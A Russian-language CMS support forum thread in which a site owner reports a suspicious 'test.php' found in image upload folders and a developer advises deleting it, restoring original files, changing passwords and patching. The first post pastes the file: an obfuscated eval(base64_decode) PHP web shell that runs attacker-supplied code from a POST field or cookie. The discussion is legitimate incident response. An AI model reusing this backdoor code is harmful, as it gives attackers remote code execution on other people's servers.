Подозрительный файл на сайте

[alleclf 6]

Обнаружил на сайте подозрительный php-файл. Находился в двух папках "uploadsposts2014-03" и "2014-05".

Вот сам файл "test.php":

<?php /*c98a03cd2172e85bf13c4a5e87e5e49e*/ eval(base64_decode("JHAgID0gICAnaic7OyA7IDsgICAgICBpZiAgICAgKCAgICBpc3NldCgg

ICAgICRfQ09PS0lFWydkd2MnXSkgICAgKSAgeyAgICAgZWNobyAgICAnPGN3ZD4nICAgIC4gIGdldG

N3ZCgpICAuICAgICc8L2N3ZD4nOzsgOyAgICAgfSAgIGlmICAgICAoICAgIGlzc2V0ICAgICAoICAkX1B

PU1RbJ3BjOTgnXSAgICAgKSAgICkgICAgeyAgICBldmFsICAgICggICAgYmFzZTY0X2RlY29kZSAgK

CAgICRfUE9TVFsncGM5OCddICAgICApICAgICApOzsgOyAgIHJldHVybjs7IDsgICAgIH0gICAgaWYgI

CAoICAgIGlzc2V0KCAgICAkX0NPT0tJRVsncGM5OCddKSAgKSAgICB7ICAgZXZhbCAgICAoICAgIC

BiYXNlNjRfZGVjb2RlICAgICAoICAkX0NPT0tJRVsncGM5OCddICAgKSAgKTs7IDsgOyAgICAgIHJldHVybjs7ICAgfSAg")); ?>

* я добавил несколько сносок, так как текст файла вылазит далеко за страницу вправо.

Я немного изменяю дизайн и поправляю размер картинок. Что бы не возиться через админку я просто скачиваю все необходимые файлы на комп и изменяю в программе ACDSee. Изменение заключается в увеличении размера картинки, немного, на 20-50 пх. На качество изображения это не особо влияет.

Так вот, именно в папке "2014-03" там где я нашел подозрительный файл, на 3 картинках при изменении в программе ACDSee выскочило сообщение о какой-то ошибке, то-ли формата, то-ли атрибута. К сожалению точной формулировки не помню. Но, картинка изменилась в размере и при повторном редактировании уже ничего не выскакивает.

Может у меня и картинки заражены? Есть какой-то инструмент для проверки? Желательно локально, хотя можно и в он-лайн прогнать.

По сайту ничего не замечаю, вроде всё работает как надо.

Изменено 22 декабря 2014 пользователем alleclf

[celsoft 6 072]

alleclf,

Никаких PHP файлов в этих папках быть не должно. Залить их через DLE также не возможно. У вас есть уязвимости на вашем сервере, например другие скрипты или сторонние модификации, или уязвимости в серверном ПО. Злоумышленникам их удалось залить, но видимо из за того что запуск скриптов в этих папках запрещен в DLE, их не смогли запустить и навредить дальше. Их нужно обязательно удалять. И проверять свой сервер, удалять все посторонние скрипты и модификации, восстановив оригинальные файлы DLE. А также сменить все пароли к серверу и скрипту DLE

[alleclf 6]

celsoft,

я проверил все файлы движка, из сторонних модулей только BlockPro, партнерка от Loadpays и кнопки соц.сетей Share42.

Сейчас на сервере нет ничего лишнего и подозрительного. Остался вопрос с картинками, как их проверить?

[celsoft 6 072]

Остался вопрос с картинками, как их проверить?

Файлы имеющие расширения картинок, не могут выполняться как скрипты, если в папках оригинальные файлы .htaccess, поэтому какой либо особой проверки для них делать не нужно.

Кстати я забыл написать. Вы пользуетесь актуальной версией скрипта или устаревшими? Если старыми версиями скрипта, то незабудьте проверить что вы установили все необходимые патчи безопасности http://dle-news.ru/bags/

[alleclf 6]

Кстати я забыл написать. Вы пользуетесь актуальной версией скрипта или устаревшими? Если старыми версиями скрипта, то незабудьте проверить что вы установили все необходимые патчи безопасности http://dle-news.ru/bags/

Остановился на 9.8, пока нет возможности продлить. Все патчи установлены, хотя проверю, может что-то пропустил. Спасибо.